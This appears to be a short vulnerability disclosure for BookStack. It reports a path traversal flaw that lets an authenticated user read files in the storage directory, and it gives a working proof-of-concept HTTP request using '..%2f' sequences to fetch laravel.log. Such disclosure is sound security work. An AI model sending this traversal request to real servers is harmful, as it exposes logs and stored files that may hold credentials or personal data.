During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.
GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1
Read log files which paths are predictable.